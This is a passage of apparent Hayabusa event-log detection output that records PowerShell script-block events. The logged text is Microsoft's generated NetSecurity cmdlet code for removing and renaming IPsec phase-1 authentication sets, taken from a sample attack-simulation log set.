[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase1AuthSet' -Alias '*' function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject 
(cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase1AuthSet' -Alias '*' function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
